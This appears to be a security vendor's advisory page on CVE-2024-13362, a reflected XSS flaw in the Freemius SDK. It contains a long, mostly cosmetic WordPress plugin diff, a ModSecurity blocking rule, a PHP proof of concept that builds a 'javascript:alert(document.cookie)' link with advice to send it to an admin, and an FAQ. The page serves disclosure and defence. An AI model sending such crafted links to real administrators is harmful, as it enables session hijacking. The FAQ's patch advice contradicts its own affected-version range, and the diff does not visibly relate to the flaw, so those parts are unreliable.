-        'color_palette'     => apply_filters( 'csf_color_palette', array() ),
+      wp_localize_script('csf', 'csf_vars', array(
+        'color_palette'     => apply_filters('csf_color_palette', array()),
         'i18n'              => array(
-          'confirm'         => esc_html__( 'Are you sure?', 'csf' ),
-          'typing_text'     => esc_html__( 'Please enter %s or more characters', 'csf' ),
-          'searching_text'  => esc_html__( 'Searching...', 'csf' ),
-          'no_results_text' => esc_html__( 'No results found.', 'csf' ),
+          'confirm'         => esc_html__('Are you sure?', 'csf'),
+          'typing_text'     => esc_html__('Please enter %s or more characters', 'csf'),
+          'searching_text'  => esc_html__('Searching...', 'csf'),
+          'no_results_text' => esc_html__('No results found.', 'csf'),
         ),
-      ) );
+      ));

       // Enqueue fields scripts and styles
       $enqueued = array();

-      if ( ! empty( self::$fields ) ) {
-        foreach ( self::$fields as $field ) {
-          if ( ! empty( $field['type'] ) ) {
+      if (! empty(self::$fields)) {
+        foreach (self::$fields as $field) {
+          if (! empty($field['type'])) {
             $classname = 'CSF_Field_' . $field['type'];
-            if ( class_exists( $classname ) && method_exists( $classname, 'enqueue' ) ) {
-              $instance = new $classname( $field );
-              if ( method_exists( $classname, 'enqueue' ) ) {
+            if (class_exists($classname) && method_exists($classname, 'enqueue')) {
+              $instance = new $classname($field);
+              if (method_exists($classname, 'enqueue')) {
                 $instance->enqueue();
               }
-              unset( $instance );
+              unset($instance);
             }
           }
         }
       }

-      do_action( 'csf_enqueue' );
-
+      do_action('csf_enqueue');
     }

     // Add typography enqueue styles to front page
-    public static function add_typography_enqueue_styles() {
+    public static function add_typography_enqueue_styles()
+    {

-      if ( ! empty( self::$webfonts ) ) {
+      if (! empty(self::$webfonts)) {

-        if ( ! empty( self::$webfonts['enqueue'] ) ) {
+        if (! empty(self::$webfonts['enqueue'])) {

           $query = array();
           $fonts = array();

-          foreach ( self::$webfonts['enqueue'] as $family => $styles ) {
-            $fonts[] = $family . ( ( ! empty( $styles ) ) ? ':'. implode( ',', $styles ) : '' );
+          foreach (self::$webfonts['enqueue'] as $family => $styles) {
+            $fonts[] = $family . ((! empty($styles)) ? ':' . implode(',', $styles) : '');
           }

-          if ( ! empty( $fonts ) ) {
-            $query['family'] = implode( '%7C', $fonts );
+          if (! empty($fonts)) {
+            $query['family'] = implode('%7C', $fonts);
           }

-          if ( ! empty( self::$subsets ) ) {
-            $query['subset'] = implode( ',', self::$subsets );
+          if (! empty(self::$subsets)) {
+            $query['subset'] = implode(',', self::$subsets);
           }

           $query['display'] = 'swap';

-          wp_enqueue_style( 'csf-google-web-fonts', esc_url( add_query_arg( $query, '//fonts.googleapis.com/css' ) ), array(), null );
-
+          wp_enqueue_style('csf-google-web-fonts', esc_url(add_query_arg($query, '//fonts.googleapis.com/css')), array(), null);
         }

-        if ( ! empty( self::$webfonts['async'] ) ) {
+        if (! empty(self::$webfonts['async'])) {

           $fonts = array();

-          foreach ( self::$webfonts['async'] as $family => $styles ) {
-            $fonts[] = $family . ( ( ! empty( $styles ) ) ? ':'. implode( ',', $styles ) : '' );
+          foreach (self::$webfonts['async'] as $family => $styles) {
+            $fonts[] = $family . ((! empty($styles)) ? ':' . implode(',', $styles) : '');
           }

-          wp_enqueue_script( 'csf-google-web-fonts', esc_url( '//ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js' ), array(), null );
-
-          wp_localize_script( 'csf-google-web-fonts', 'WebFontConfig', array( 'google' => array( 'families' => $fonts ) ) );
+          wp_enqueue_script('csf-google-web-fonts', esc_url('//ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js'), array(), null);

+          wp_localize_script('csf-google-web-fonts', 'WebFontConfig', array('google' => array('families' => $fonts)));
         }
-
       }
-
     }

     // Add admin body class
-    public static function add_admin_body_class( $classes ) {
+    public static function add_admin_body_class($classes)
+    {

-      if ( apply_filters( 'csf_fa4', false ) ) {
+      if (apply_filters('csf_fa4', false)) {
         $classes .= 'csf-fa5-shims';
       }

       return $classes;
-
     }

     // Add custom css to front page
-    public static function add_custom_css() {
+    public static function add_custom_css()
+    {

-      if ( ! empty( self::$css ) ) {
-        echo '<style type="text/css">'. wp_strip_all_tags( self::$css ) .'</style>';
+      if (! empty(self::$css)) {
+        echo '<style type="text/css">' . wp_strip_all_tags(self::$css) . '</style>';
       }
-
     }

     // Add a new framework field
-    public static function field( $field = array(), $value = '', $unique = '', $where = '', $parent = '' ) {
+    public static function field($field = array(), $value = '', $unique = '', $where = '', $parent = '')
+    {

       // Check for unallow fields
-      if ( ! empty( $field['_notice'] ) ) {
+      if (! empty($field['_notice'])) {

         $field_type = $field['type'];

         $field            = array();
-        $field['content'] = esc_html__( 'Oops! Not allowed.', 'csf' ) .' <strong>('. $field_type .')</strong>';
+        $field['content'] = esc_html__('Oops! Not allowed.', 'csf') . ' <strong>(' . $field_type . ')</strong>';
         $field['type']    = 'notice';
         $field['style']   = 'danger';
-
       }

       $depend     = '';
       $visible    = '';
-      $unique     = ( ! empty( $unique ) ) ? $unique : '';
-      $class      = ( ! empty( $field['class'] ) ) ? ' ' . esc_attr( $field['class'] ) : '';
-      $is_pseudo  = ( ! empty( $field['pseudo'] ) ) ? ' csf-pseudo-field' : '';
-      $field_type = ( ! empty( $field['type'] ) ) ? esc_attr( $field['type'] ) : '';
+      $unique     = (! empty($unique)) ? $unique : '';
+      $class      = (! empty($field['class'])) ? ' ' . esc_attr($field['class']) : '';
+      $is_pseudo  = (! empty($field['pseudo'])) ? ' csf-pseudo-field' : '';
+      $field_type = (! empty($field['type'])) ? esc_attr($field['type']) : '';

-      if ( ! empty( $field['dependency'] ) ) {
+      if (! empty($field['dependency'])) {

         $dependency      = $field['dependency'];
         $depend_visible  = '';
@@ -729,70 +726,65 @@
         $data_value      = '';
         $data_global     = '';

-        if ( is_array( $dependency[0] ) ) {
-          $data_controller = implode( '|', array_column( $dependency, 0 ) );
-          $data_condition  = implode( '|', array_column( $dependency, 1 ) );
-          $data_value      = implode( '|', array_column( $dependency, 2 ) );
-          $data_global     = implode( '|', array_column( $dependency, 3 ) );
-          $depend_visible  = implode( '|', array_column( $dependency, 4 ) );
+        if (is_array($dependency[0])) {
+          $data_controller = implode('|', array_column($dependency, 0));
+          $data_condition  = implode('|', array_column($dependency, 1));
+          $data_value      = implode('|', array_column($dependency, 2));
+          $data_global     = implode('|', array_column($dependency, 3));
+          $depend_visible  = implode('|', array_column($dependency, 4));
         } else {
-          $data_controller = ( ! empty( $dependency[0] ) ) ? $dependency[0] : '';
-          $data_condition  = ( ! empty( $dependency[1] ) ) ? $dependency[1] : '';
-          $data_value      = ( ! empty( $dependency[2] ) ) ? $dependency[2] : '';
-          $data_global     = ( ! empty( $dependency[3] ) ) ? $dependency[3] : '';
-          $depend_visible  = ( ! empty( $dependency[4] ) ) ? $dependency[4] : '';
+          $data_controller = (! empty($dependency[0])) ? $dependency[0] : '';
+          $data_condition  = (! empty($dependency[1])) ? $dependency[1] : '';
+          $data_value      = (! empty($dependency[2])) ? $dependency[2] : '';
+          $data_global     = (! empty($dependency[3])) ? $dependency[3] : '';
+          $depend_visible  = (! empty($dependency[4])) ? $dependency[4] : '';
         }

-        $depend .= ' data-controller="'. esc_attr( $data_controller ) .'"';
-        $depend .= ' data-condition="'. esc_attr( $data_condition ) .'"';
-        $depend .= ' data-value="'. esc_attr( $data_value ) .'"';
-        $depend .= ( ! empty( $data_global ) ) ? ' data-depend-global="true"' : '';
-
-        $visible = ( ! empty( $depend_visible ) ) ? ' csf-depend-visible' : ' csf-depend-hidden';
+        $depend .= ' data-controller="' . esc_attr($data_controller) . '"';
+        $depend .= ' data-condition="' . esc_attr($data_condition) . '"';
+        $depend .= ' data-value="' . esc_attr($data_value) . '"';
+        $depend .= (! empty($data_global)) ? ' data-depend-global="true"' : '';

+        $visible = (! empty($depend_visible)) ? ' csf-depend-visible' : ' csf-depend-hidden';
       }

       // These attributes has been sanitized above.
-      echo '<div class="csf-field csf-field-'. $field_type . $is_pseudo . $class . $visible .'"'. $depend .'>';
+      echo '<div class="csf-field csf-field-' . $field_type . $is_pseudo . $class . $visible . '"' . $depend . '>';

-      if ( ! empty( $field_type ) ) {
+      if (! empty($field_type)) {

-        if ( ! empty( $field['title'] ) ) {
+        if (! empty($field['title'])) {
           echo '<div class="csf-title">';
-          echo '<h4>'. $field['title'] .'</h4>';
-          echo ( ! empty( $field['subtitle'] ) ) ? '<div class="csf-subtitle-text">'. $field['subtitle'] .'</div>' : '';
+          echo '<h4>' . $field['title'] . '</h4>';
+          echo (! empty($field['subtitle'])) ? '<div class="csf-subtitle-text">' . $field['subtitle'] . '</div>' : '';
           echo '</div>';
         }

-        echo ( ! empty( $field['title'] ) ) ? '<div class="csf-fieldset">' : '';
+        echo (! empty($field['title'])) ? '<div class="csf-fieldset">' : '';

-        $value = ( ! isset( $value ) && isset( $field['default'] ) ) ? $field['default'] : $value;
-        $value = ( isset( $field['value'] ) ) ? $field['value'] : $value;
+        $value = (! isset($value) && isset($field['default'])) ? $field['default'] : $value;
+        $value = (isset($field['value'])) ? $field['value'] : $value;

-        $classname = 'CSF_Field_'. $field_type;
+        $classname = 'CSF_Field_' . $field_type;

-        if ( class_exists( $classname ) ) {
-          $instance = new $classname( $field, $value, $unique, $where, $parent );
+        if (class_exists($classname)) {
+          $instance = new $classname($field, $value, $unique, $where, $parent);
           $instance->render();
         } else {
-          echo '<p>'. esc_html__( 'Field not found!', 'csf' ) .'</p>';
+          echo '<p>' . esc_html__('Field not found!', 'csf') . '</p>';
         }
-
       } else {
-        echo '<p>'. esc_html__( 'Field not found!', 'csf' ) .'</p>';
+        echo '<p>' . esc_html__('Field not found!', 'csf') . '</p>';
       }

-      echo ( ! empty( $field['title'] ) ) ? '</div>' : '';
+      echo (! empty($field['title'])) ? '</div>' : '';
       echo '<div class="clear"></div>';
       echo '</div>';
-
     }
-
   }
-
 }

-CSF_Setup::init( __FILE__, true );
+CSF_Setup::init(__FILE__, true);

 /**
  *
@@ -802,6 +794,6 @@
  * @version 1.0.0
  *
  */
-if ( ! class_exists( 'CSF' ) ) {
-  class CSF extends CSF_Setup{}
+if (! class_exists('CSF')) {
+  class CSF extends CSF_Setup {}
 }
--- a/html5-audio-player/admin/global/free-plugin-list.php
+++ b/html5-audio-player/admin/global/free-plugin-list.php
@@ -1,201 +0,0 @@
-<?php
-require_once ABSPATH . "wp-admin/includes/plugin-install.php";
-
-function h5ap_free_plugin_loaded(){
-    wp_enqueue_script('plugin-install');
-    wp_enqueue_script('updates');
-}
-add_action('init', 'h5ap_free_plugin_loaded');
-//$table->display();
-if (!class_exists('H5AP_BPlugins_Free_plugins')) {
-    class H5AP_BPlugins_Free_plugins
-    {
-
-        public function __construct()
-        {
-            add_action('admin_menu', array($this, 'bplugins_free_plugins_menu'));
-        }
-        public function bplugins_free_plugins_menu()
-        {
-            add_submenu_page(
-                'edit.php?post_type=videoplayer',
-                'Our Free Plugins',
-                'Our Free Plugins',
-                'manage_options',
-                'free-plugins-from-bplugins',
-                array($this, 'bplugin_free_plugin_list')
-            );
-        }
-
-        public function bplugin_free_plugin_list()
-        {
-            $fields = array(
-                'active_installs' => true, // rounded int
-                'added' => false, // date
-                'author' => true, // a href html
-                'author_block_count' => false, // int
-                'author_block_rating' => false, // int
-                'author_profile' => false, // url
-                'banners' => false, // array( [low], [high] )
-                'compatibility' => true, // empty array?
-                'contributors' => false, // array( array( [profile], [avatar], [display_name] )
-                'description' => false, // string
-                'donate_link' => false, // url
-                'download_link' => true, // url
-                'downloaded' => true, // int
-                // 'group' => false,                 // n/a
-                'homepage' => false, // url
-                'icons' => true, // array( [1x] url, [2x] url )
-                'last_updated' => true, // datetime
-                'name' => true, // string
-                'num_ratings' => true, // int
-                'rating' => true, // int
-                'ratings' => true, // array( [5..0] )
-                'requires' => true, // version string
-                'requires_php' => true, // version string
-                // 'reviews' => false,               // n/a, part of 'sections'
-                'screenshots' => false, // array( array( [src],  ) )
-                'sections' => true, // array( [description], [installation], [changelog], [reviews], ...)
-                'short_description' => true, // string
-                'slug' => true, // string
-                'support_threads' => false, // int
-                'support_threads_resolved' => false, // int
-                'tags' => false, // array( )
-                'tested' => false, // version string
-                'version' => true, // version string
-                'versions' => true, // array( [version] url )
-            );
-            $plugins = plugins_api('query_plugins', array(
-                'author' => 'abuhayat',
-                'per_page' => 30,
-                //'fields' => $fields,
-            ));
-            ?>
-
-<div class="bplgins_free_plugins">
-    <div class="wp-filter" style="text-align: center;">
-        <h1 style="padding:10px;">Free PLugnis From bPLugins</h1>
-    </div>
-    <form id="plugin-filter" method="post">
-        <div class="wp-list-table widefat plugin-install">
-            <h2 class='screen-reader-text'>Plugins list</h2>
-            <div id="the-list">
-                <?php foreach ($plugins->plugins as $plugin):
-
-                $title = $plugin['name'];
-                $version = $plugin['version'];
-                $name = strip_tags($title . ' ' . $version);
-                $details_link = self_admin_url("plugin-install.php?tab=plugin-information&plugin=" . $plugin["slug"] .
-                    "&TB_iframe=true&width=753&height=852");
-                $status = install_plugin_install_status($plugin);
-                $requires_php = isset($plugin->requires_php) ? $plugin->requires_php : null;
-                $requires_wp = isset($plugin->requires) ? $plugin->requires : null;
-
-                $compatible_php = is_php_version_compatible($requires_php);
-                $compatible_wp = is_wp_version_compatible($requires_wp);
-                $action_links = array();
-                if (current_user_can("install_plugins") || current_user_can("update_plugins")) {
-                    $status = install_plugin_install_status($plugin);
-                    switch ($status['status']) {
-                        case 'install':
-                            if ($status['url']) {
-                                if ($compatible_php && $compatible_wp) {
-                                    // $action_links[] = '<a onClick="disableClick()" data-slug="' . esc_attr($plugin['slug']) . '" id="plugin_install_from_iframe" class="button button-primary right" href="' . esc_attr($plugin['slug']) . '" target="_parent">' . __('Install Now') . '</a>';
-                                    $action_links[] = '<a class="install-now button" data-slug="' . esc_attr($plugin['slug']) . '" href="' . esc_attr($status['url']) . '" aria-label="Install ' . esc_attr($name) . ' now" data-name="' . esc_attr($name) . '">Install Now</a>';
-                                } else {
-                                    $action_links[] = '<button type="button" class="button button-primary button-disabled right" disabled="disabled">Cannot Install</button>';
-                                }
-                            }
-                            break;
-                        case 'update_available':
-                            if ($status['url']) {
-                                if ($compatible_php) {
-                                    //$action_links[] = '<a data-slug="' . esc_attr($plugin['slug']) . '" data-plugin="' . esc_attr($status['file']) . '" id="plugin_update_from_iframe" class="button button-primary right" href="' . $status['url'] . '" target="_parent">' . __('Install Update') . '</a>';
-                                    $action_links[] = '<a class="update-now button aria-button-if-js" data-plugin="' . esc_attr($status['file']) . '" data-slug="' . esc_attr($plugin['slug']) . '" href="' . $status['url'] . '" aria-label="Update PDF Poster – PDF Embedder Plugin for WordPress 1.6.3 now" data-name="' . esc_attr($plugin['name']) . '" role="button">Update Now</a>';
-                                } else {
-
-                                    $action_links[] = '<button type="button" class="button button-primary button-disabled right" disabled="disabled">Cannot Update</button>';
-
-                                }
-                            }
-                            break;
-                        case 'newer_installed':
-                            /* translators: %s: Plugin version. */
-                            $action_links[] = '<a class="button button-primary right disabled">' . sprintf(__('Newer Version (%s) Installed'), $status['version']) . '</a>';
-                            break;
-                        case 'latest_installed':
-                            $action_links[] = '<a class="button button-primary right disabled">' . __('Installed') . '</a>';
-                            break;
-                    }
-                }
-                $action_links[] = '<a href="' . esc_url($details_link) . '" class="thickbox" aria-label="' . esc_attr(sprintf("More information about %s", $plugin['name'])) . '" data-title="' . esc_attr($plugin['name']) . '">' . __('More Details') . '</a>';
-
-                ?>
-
-																					                <div class="plugin-card plugin-card-<?php echo $plugin['slug']; ?>">
-																					                    <div class="plugin-card-top">
-																					                        <div class="name column-name">
-																					                            <h3>
-																					                                <a href="<?php echo $details_link; ?>" class="thickbox open-plugin-details-modal">
-																					                                    <?php echo $plugin['name']; ?> <img src="<?php echo $plugin['icons']['1x'] ?>"
-																					                                        class="plugin-icon" alt="">
-																					                                </a>
-																					                            </h3>
-																					                        </div>
-																					                        <div class="action-links">
-																					                            <ul class="plugin-action-buttons">
-																					                                <li><?php if ($action_links) {
-                    echo implode("</li><li>", $action_links);
-                }
-                ?></li>
-																					                            </ul>
-																					                        </div>
-																					                        <div class="desc column-description">
-																					                            <p><?php echo $plugin['short_description']; ?></p>
-																					                            <p class="authors"> <cite>By <?php echo $plugin['author'] ?></cite>
-																					                            </p>
-																					                        </div>
-																					                    </div>
-																					                    <div class="plugin-card-bottom">
-																					                        <div class="vers column-rating">
-																					                            <?php wp_star_rating(array("rating" => $plugin["rating"], "type" => "percent", "number" => $plugin["num_ratings"]));?>
-																					                            <span class="num-ratings">
-																					                                (<?php echo number_format_i18n($plugin["num_ratings"]); ?>)
-																					                            </span>
-																					                        </div>
-																					                        <div class="column-updated">
-																					                            <strong><?php _e("Last Updated:");?></strong>
-																					                            <span title="<?php echo esc_attr($plugin["last_updated"]); ?>">
-																					                                <?php printf("%s ago", human_time_diff(strtotime($plugin["last_updated"])));?>
-																					                            </span>
-																					                        </div>
-																					                        <div class="column-updated">
-																					                            <?php echo sprintf(_n("%s download", "%s downloads", $plugin["downloaded"]), number_format_i18n($plugin["downloaded"])); ?>
-																					                        </div>
-																					                        <div class="column-downloaded">
-																					                            <?php //echo $plugin['active_installs'] . '+ Active Installations'; ?> </div>
-																					                        <div class="column-compatibility">
-																					                            <?php
-    if (!empty($plugin["tested"]) && version_compare(substr($GLOBALS["wp_version"], 0, strlen($plugin["tested"])), $plugin["tested"], ">")) {
-                    echo '<span class="compatibility-untested">' . __("<strong>Untested</strong> with your version of WordPress") . '</span>';
-                } elseif (!empty($plugin["requires"]) && version_compare(substr($GLOBALS["wp_version"], 0, strlen($plugin["requires"])), $plugin["requires"], "<")) {
-                echo '<span class="compatibility-incompatible">' . __("Incompatible with your version of WordPress") . '</span>';
-            } else {
-                echo '<span class="compatibility-compatible">' . __("Compatible with your version of WordPress") . '</span>';
-            }
-            ?>
-                        </div>
-                    </div>
-                </div>
-                <?php endforeach;?>
-
-            </div>
-        </div>
-    </form>
-</div>
-<?php
-
-        }
-    }
-}
-new H5AP_BPlugins_Free_plugins();
 No newline at end of file
--- a/html5-audio-player/admin/global/help-usages.php
+++ b/html5-audio-player/admin/global/help-usages.php
@@ -1,84 +0,0 @@
-<?php
-
-/*-------------------------------------------------------------------------------*/
-// Developer page
-/*-------------------------------------------------------------------------------*/
-add_action('admin_menu', 'h5ap_support_page');
-
-function h5ap_support_page()
-{
-    add_submenu_page('edit.php?post_type=audioplayer', 'Help', 'Help', 'manage_options', 'h5ap-support', 'h5ap_support_page_callback');
-}
-
-function h5ap_support_page_callback(){
-    ?>
-    <div class="bplugins-container">
-        <div class="row">
-            <div class="bplugins-features">
-                <div class="col col-12">
-                    <div class="bplugins-feature center">
-                        <h1><?php _e("Help & Usages", "h5ap"); ?></h1>
-                    </div>
-                </div>
-            </div>
-        </div>
-    </div>
-<div class="bplugins-container">
-    <div class="row">
-        <div class="bplugins-features">
-            <div class="col col-4">
-                <div class="bplugins-feature center">
-                    <i class="fa fa-life-ring"></i>
-                    <h3><?php _e('Need any Assistance?', 'h5ap'); ?></h3>
-                    <p><?php _e('Our Expert Support Team is always ready to help you out promptly.', 'h5ap'); ?></p>
-                    <a href="https://bplugins.com/support/" target="_blank" class="button
-                    button-primary"><?php _e('Contact Support', 'h5ap') ?></a>
-                </div>
-            </div>
-            <div class="col col-4">
-                <div class="bplugins-feature center">
-                    <i class="fa fa-file-text"></i>
-                    <h3><?php _e('Looking for Documentation?', 'h5ap') ?></h3>
-                    <p><?php echo _e("We have detailed documentation on every aspects of HTML5 Audio Player.", "h5ap") ?></p>
-                    <a href="https://audioplayerwp.com/docs/" target="_blank" class="button button-primary"><?php _e("Documentation", "h5ap") ?></a>
-                </div>
-            </div>
-            <div class="col col-4">
-                <div class="bplugins-feature center">
-                    <i class="fa fa-thumbs-up"></i>
-                    <h3><?php _e("Like This Plugin?", "h5ap"); ?></h3>
-                    <p><?php _e("If you like HTML5 Audio Player, please leave us a 5 ⭐ rating.", "h5ap") ?></p>
-                    <a href="https://wordpress.org/support/plugin/html5-audio-player/reviews/#new-post" target="_blank" class="button
-                    button-primary"><?php _e("Rate the Plugin", "h5ap"); ?></a>
-                </div>
-            </div>
-        </div>
-    </div>
-</div>
-<div class="bplugins-container">
-    <div class="row">
-        <div class="bplugins-features">
-            <div class="col col-12">
-                <div class="bplugins-feature center" style="padding:5px;">
-                    <h2 style="font-size:22px;"><?php _e("Looking For Demo?", "h5ap"); ?> <a href="https://audioplayerwp.com/" target="_blank"><?php _e("Click Here", "h5ap"); ?></a></h2>
-                </div>
-            </div>
-        </div>
-    </div>
-</div>
-<div class="bplugins-container">
-    <div class="row">
-        <div class="bplugins-features">
-            <div class="col col-12">
-                <div class="bplugins-feature center">
-                    <h1><?php _e("Video Tutorials", "h5ap"); ?></h1><br/>
-                    <div class="embed-container"><iframe width="100%" height="700px" src="https://www.youtube.com/embed/MbY9oyERJck" frameborder="0"
-                    allowfullscreen></iframe></div>
-                </div>
-            </div>
-        </div>
-    </div>
-</div>
-
-<?php
-}
 No newline at end of file
--- a/html5-audio-player/admin/inc/import-meta.php
+++ b/html5-audio-player/admin/inc/import-meta.php
@@ -1,252 +0,0 @@
-<?php
-
- function h5ap_import_data_ajax(){
-    h5ap_import_data();
-    h5ap_import_settings();
-    echo wp_json_encode(array(
-        'success' => true,
-    ));
-    die();
-}
-add_action("wp_ajax_h5ap_import_data", 'h5ap_import_data_ajax');
-
-function h5ap_import_data(){
-    $players = new WP_Query(array(
-        'post_type' => 'audioplayer',
-        'post_status' => 'any',
-        'posts_per_page' => -1
-    ));
-
-    while ($players->have_posts()): $players->the_post();
-
-

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2024-13362
# Blocks reflected XSS via the 'url' parameter in the CSF welcome page
# Targets the specific vulnerable endpoint and parameter

SecRule REQUEST_URI "@streq /wp-admin/admin.php" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 - Reflected XSS via url parameter in Freemius welcome page',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule ARGS:page "@streq csf-welcome" "chain"
    SecRule ARGS:url "@rx (?:javascript|data|vbscript):" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

<?php
$target_url = 'http://example.com'; // Change this to the target WordPress admin URL
$admin_page = '/wp-admin/admin.php?page=csf-welcome';
$payload = 'javascript:alert(document.cookie)';

// Construct the malicious URL
$attack_url = $target_url . $admin_page . '&url=' . urlencode($payload);

echo "[+] Atomic Edge CVE-2024-13362 PoCn";
echo "[+] Target: $target_urln";
echo "[+] Crafed URL: $attack_urlnn";
echo "[+] Instructions: Send this link to an admin user. When they click it, the XSS will execute.n";
echo "[+] Alternatively, open this URL in a browser where you are logged in as admin.nn";

// Use cURL to verify the page loads (optional)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $attack_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_test_cookie=WP+Cookie+check'); // Adjust for your session

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] HTTP Status: $http_coden";
if ($http_code == 200) {
    echo "[+] Page loaded successfully. Check response body for XSS payload in output.n";
} else {
    echo "[!] Failed to load page. The vulnerability may require authentication or a specific setup.n";
}
?>

Frequently Asked Questions

What is CVE-2024-13362?
Understanding the vulnerability
CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability found in the Freemius SDK version 2.10.1 and earlier. It allows unauthenticated attackers to inject arbitrary JavaScript into WordPress admin pages through an insufficiently sanitized ‘url’ parameter.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability occurs when the ‘url’ parameter is processed and rendered directly into the HTML of the admin welcome page without proper sanitization. An attacker can craft a malicious URL that, when clicked by an admin, executes JavaScript in the context of the admin session.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Freemius SDK version 2.10.1 or earlier is at risk. This includes multiple plugins and themes that bundle this SDK, particularly those using the Codestar Framework integration.
How can I check if my site is vulnerable?
Verifying your WordPress installation
Check the version of the Freemius SDK used by your plugins or themes. If your site is running version 2.10.1 or earlier, it is vulnerable to this XSS issue. Review the plugin or theme documentation for details on the SDK version.
How can I fix or mitigate this issue?
Applying the necessary updates
To remediate this vulnerability, update the affected plugins or themes to the patched version 2.5.1 or later. Ensure that proper input sanitization and output escaping are implemented for any user-supplied data.
What does the CVSS score of 6.1 indicate?
Understanding severity levels
A CVSS score of 6.1 indicates a medium severity vulnerability. It suggests that while exploitation requires user interaction, successful attacks can lead to significant consequences, including session hijacking and full site compromise.
What practical risks does this vulnerability pose?
Potential consequences of exploitation
If exploited, an attacker can execute arbitrary JavaScript in the admin’s browser, potentially leading to session hijacking, unauthorized account creation, or malicious changes to the WordPress site. The attack executes in the admin context, allowing full site control.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept shows how an attacker can construct a malicious URL that includes a JavaScript payload in the ‘url’ parameter. When an admin clicks this link, the payload executes, demonstrating the XSS vulnerability in action.
What steps should I take after applying the patch?
Post-update best practices
After updating to the patched version, review your site’s security settings and ensure that all user input is properly sanitized. Regularly monitor your site for unusual activity and consider implementing additional security measures such as web application firewalls.
Are there any preventive measures I can implement?
Enhancing overall security
To prevent similar vulnerabilities, ensure that all plugins and themes are regularly updated and only use those from reputable sources. Implement security plugins that offer features like input validation and output escaping to enhance your site’s defenses.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations